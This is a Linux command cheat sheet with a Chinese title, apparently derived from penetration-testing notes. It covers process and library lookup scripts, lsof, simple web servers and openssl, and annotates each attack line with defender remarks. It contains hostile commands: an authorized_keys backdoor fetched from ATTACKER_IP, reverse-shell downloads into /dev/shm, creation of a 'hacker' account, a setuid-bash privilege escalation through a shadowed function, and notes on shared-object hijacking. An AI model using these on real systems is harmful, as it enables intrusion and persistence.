bash 实现一些命令
pidof
#!/bin/sh
# 定义一个函数,参数为进程名
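#######################################
# Print the PIDs of every process whose `ps aux` line matches a name.
# The script's shebang is /bin/sh: `local` is accepted by dash, but the
# array syntax the original used here is not, so the result is kept as a
# plain newline-separated string (the original also printed only the first
# element of its array, silently dropping every other match).
# Arguments: $1 - process name (used as a grep pattern)
# Outputs:   matching PIDs, one per line, or a "not found" message
# Returns:   1 on wrong usage, 0 otherwise
#######################################
pidof_process() {
  if [ $# -ne 1 ]; then
    echo "Usage: pidof_process <process_name>"
    return 1
  fi
  local process_name="$1"
  local pids
  # Drop the pipeline's own grep, any line mentioning this script ($0) and
  # this shell's own PID ($$), so the lookup never reports itself.
  # `-e` keeps a pattern that starts with "-" (e.g. $0 == "-bash") from
  # being parsed as a grep option.
  pids=$(ps aux \
    | grep -- "$process_name" \
    | grep -v -e "grep" -e "$0" \
    | awk -v self="$$" '$2 != self { print $2 }')
  if [ -n "$pids" ]; then
    printf '%s\n' "$pids"
  else
    echo "Process $process_name not found."
  fi
}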
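# Entry point: require exactly one argument, then look the process up.
# The original printed the usage text but carried on and called the function
# with an unquoted, possibly empty $1, so the usage line appeared twice;
# now a bad invocation stops here with a non-zero status.
if [ $# -ne 1 ]; then
  echo "Usage: pidof_process <process_name>"
  exit 1
fi
pidof_process "$1"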
通过 pid 获取进程加载的动态库
#!/bin/bash
# 定义一个函数,参数为进程的 PID
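#######################################
# Print the shared objects mapped into a process, one per line, deduplicated.
# Arguments: $1 - PID of the process
# Outputs:   path field (column 6) of every /proc/<pid>/maps line whose path
#            contains ".so", sorted and unique
# Returns:   1 if the PID does not exist or its maps file is not readable,
#            0 otherwise
#######################################
list_shared_libraries() {
  local pid="$1"
  local maps_file="/proc/$pid/maps"
  # A missing maps file means there is no such process.
  if [ ! -e "$maps_file" ]; then
    echo "Process with PID $pid not found."
    return 1
  fi
  # Another user's maps file exists but is unreadable; report that instead of
  # letting awk print an error and then returning an empty list with status 0.
  if [ ! -r "$maps_file" ]; then
    echo "Cannot read $maps_file (permission denied)."
    return 1
  fi
  # Column 6 of a maps line is the mapped path (absent for anonymous
  # mappings), so the ".so" test is applied to that field only.  The result
  # is streamed rather than stored in an array: the original's
  # `libraries=($(...))` word-split and glob-expanded the awk output.
  awk '$6 ~ /\.so/ { print $6 }' "$maps_file" | sort -u
}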
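# Require a PID argument.
if [ -z "$1" ]; then
  echo "Usage: $0 <PID>"
  exit 1
fi
# Capture the function's output as one newline-separated string.  The original
# captured it with `result=($(...))`, which word-split paths containing
# spaces, glob-expanded the output, printed the "not found" message one word
# per line and discarded the function's exit status.
if ! result=$(list_shared_libraries "$1"); then
  printf '%s\n' "$result" >&2
  exit 1
fi
# Print the captured list; skip the printf when the process maps no .so at
# all, so an empty result does not produce a blank line.
if [ -n "$result" ]; then
  printf '%s\n' "$result"
fi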
安装公钥
# Reference line from the page: fetches a public key from a remote host
# (ATTACKER_IP is a placeholder) and appends it to the current user's
# authorized_keys, i.e. SSH persistence for whoever holds the matching
# private key.  Defender notes: alert on writes to ~/.ssh/authorized_keys
# (auditd, inotify or a file-integrity monitor), review its contents
# regularly, and consider AuthorizedKeysFile / AuthorizedKeysCommand in
# sshd_config so that the key store lives in a path users cannot modify.
curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
下载文件到内存
#Download in RAM
# /dev/shm is a tmpfs: files written there never touch disk and vanish on
# reboot, which is why droppers stage payloads in it.  -O writes to the given
# path; -P keeps the remote file name under the given directory.
# Defender notes: mount /dev/shm and /tmp noexec,nosuid (note that noexec does
# not stop an interpreter from reading a script, so monitoring still matters);
# alert on execs of anything under /dev/shm and on wget/curl writing into it;
# dot-prefixed names such as .rev.py are a cue.  The 10.10.14.14:8000 host
# and the file names are placeholders from the page.
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
lsof
#Files used by network processes
# lsof lists open files (including sockets) per process.  Without root it only
# shows processes owned by the calling user; run as root for a host-wide view.
# -a ANDs the selections (otherwise they are ORed); +D walks the directory
# tree recursively and can be slow on large trees.
lsof #Open files belonging to any process
lsof -p 3 #Open files used by the process
lsof -i #Files used by network processes
lsof -i 4 #Files used by network IPv4 processes
lsof -i 6 #Files used by network IPv6 processes
lsof -i 4 -a -p 1234 #List all open IPv4 network files in use by the process 1234
lsof +D /lib #Processes using files inside the indicated dir
lsof -i :80 #Files used by network processes listening on or connected to port 80
# fuser: -n selects the namespace (tcp), -v prints the owning user/command;
# shows which process holds TCP port 80 (a quick check for unexpected listeners).
fuser -nv tcp 80
useradd
# Reference line from the page: creates a local account named "hacker".
# -p takes an already hashed password string (see useradd(8)); <Password> is
# a placeholder.  Defender notes: audit changes to /etc/passwd and /etc/shadow
# and the useradd entries in the auth log; an unexpected new account with a
# login shell is a persistence indicator.
useradd -p 'openssl passwd -1 <Password>' hacker
http server
# One-line static file servers that share the current working directory.
# All of them expose every file under that directory to anyone who can reach
# the port, with no authentication: run them from a directory holding nothing
# sensitive, and bind to 127.0.0.1 (e.g. `python3 -m http.server --bind 127.0.0.1`)
# when only local access is needed.  Port 80 needs root or CAP_NET_BIND_SERVICE.
# SimpleHTTPServer exists only in Python 2; http.server is its Python 3
# replacement and defaults to port 8000 when none is given.
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
# $ip is a placeholder the page never sets; with it unset the line expands to ":80".
php -S $ip:80
curl
#json data
# The body holds a password and the second request a bearer token (<JWT> is a
# placeholder).  Anything passed in argv is visible in `ps` output and shell
# history, so for real secrets read them from a file instead:
# `--data @body.json` and `-H @headers.txt` (the latter needs curl 7.55+).
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint
openssl
# Openssl
# Prints the handshake and the server's leaf certificate; add -showcerts to see the whole chain.
openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server
openssl x509 -in ca.cert.pem -text #Read certificate
openssl genrsa -out newuser.key 2048 #Create new RSA2048 key
openssl req -new -key newuser.key -out newuser.csr #Generate a certificate signing request (CSR) from the private key. Recommended to set the "Organization Name"(Fortune) and the "Common Name" (newuser@fortune.htb)
# -nodes writes the private key unencrypted: acceptable for a throwaway test
# certificate, not for anything long-lived.
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate
# -CAcreateserial writes a .srl serial-number file next to the CA certificate.
openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
# pkcs12 -export prompts for an export password that protects the bundle.
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)
# If you only need a PKCS#12 bundle built from the CA certificate and the CA key, you can do it using the line below.
# Caveat: this packages the CA's own certificate and private key; it does not
# issue a separate client certificate, and importing the file anywhere hands
# out the CA key itself.
openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12
# Decrypt ssh key
# Writes the key without passphrase protection (no -aes* option is given);
# keep the output file mode 600 and delete it when no longer needed.
openssl rsa -in key.ssh.enc -out key.ssh
#Decrypt
# -k puts the passphrase in argv (visible in ps and history); -kfile or
# -pass file:... avoid that.  Without -pbkdf2 `enc` uses the legacy
# single-iteration key derivation (OpenSSL 1.1.1+ warns about it), and the
# default digest changed from md5 to sha256 in 1.1.0, so a file encrypted by
# an older OpenSSL may need an explicit -md to decrypt — verify against the
# version that produced backup.tgz.enc.  <KEY> is a placeholder.
openssl enc -aes256 -k <KEY> -d -in backup.tgz.enc -out b.tgz
sudo suid
# Local privilege-escalation checks.  The first two commands are equally the
# defender's audit list: sudo rules and the SUID inventory should be reviewed
# and baselined, and drift from the baseline alerted on.
sudo -l #Check commands you can execute with sudo
find / -perm -4000 2>/dev/null #Find all SUID binaries
# The next two lines define and export a shell function named after a system
# binary.  Mitigations: setuid programs should invoke helpers by absolute path
# through execve with a sanitized environment rather than via the caller's
# shell and PATH (sudo's env_reset and secure_path do this for sudo); mount
# /tmp nosuid so a copied shell cannot keep the setuid bit; file-integrity
# monitoring should flag any new setuid file outside package-managed paths.
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service #Then, when you call the suid binary, this function will be executed
# Tracing a setuid binary as an unprivileged user runs it without the elevated
# ID (the kernel does not honor setuid on a ptraced exec — confirm for the
# target kernel), so the opens seen here are the unprivileged code path; the
# grep keeps the lines that show which files and paths the binary looks up.
strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"
Shared Object Hijacking
# Lets find a SUID using a non-standard library
ldd some_suid
# (sample ldd output line from the page, not a command)
something.so => /lib/x86_64-linux-gnu/something.so
# The SUID also loads libraries from a custom location where we can write
readelf -d payroll | grep PATH
# (sample readelf output line from the page, not a command)
# Defender notes: audit every setuid binary with `readelf -d` and treat a
# RUNPATH/RPATH that points at a directory writable by non-root users as a
# finding; rebuild or relink such binaries, and keep the listed directories
# root-owned and non-writable.
0x000000000000001d (RUNPATH) Library runpath: [/development]
gen passwd
# Three ways to produce a crypt(3)-style password hash ("hacker" is both the
# salt and the password in these examples).
# -1 is MD5-crypt, a legacy scheme that is fast to brute-force; prefer
# SHA-512 (`openssl passwd -6`, OpenSSL 1.1.1+) or the mkpasswd line below.
openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
# "$6$salt" selects SHA-512 crypt.  Python 2 is end-of-life, and the crypt
# module was deprecated in Python 3.11 and removed in 3.13 — verify against the
# interpreter in use.
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
Script/Binaries in PATH
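#######################################
# Enumerate scripts and executables in the directories of a PATH-like list.
# The original one-liners used backticks, `echo $PATH | tr` and an unquoted
# $d, so a directory containing whitespace or glob characters was split or
# expanded; splitting on ":" with read -a keeps each entry intact.
# Arguments: $1 - colon-separated directory list (defaults to $PATH)
# Outputs:   matching file paths, one per line
#######################################
list_path_scripts() {
  local spec="${1:-$PATH}" d
  local -a dirs
  IFS=: read -r -a dirs <<<"$spec"
  for d in "${dirs[@]}"; do
    # An empty entry (PATH=":/bin") means "." to the shell; the original
    # dropped it as well, so skip it rather than scan the working directory.
    [ -n "$d" ] || continue
    find "$d" -name '*.sh' 2>/dev/null
  done
}

#######################################
# Same as list_path_scripts, but lists every regular executable file
# (-executable is a GNU find extension, as in the original).
# Arguments: $1 - colon-separated directory list (defaults to $PATH)
# Outputs:   matching file paths, one per line
#######################################
list_path_executables() {
  local spec="${1:-$PATH}" d
  local -a dirs
  IFS=: read -r -a dirs <<<"$spec"
  for d in "${dirs[@]}"; do
    [ -n "$d" ] || continue
    find "$d" -type f -executable 2>/dev/null
  done
}

# Same output as the original two loops: first the *.sh files, then all
# executables, for every directory in the current PATH.
list_path_scripts
list_path_executables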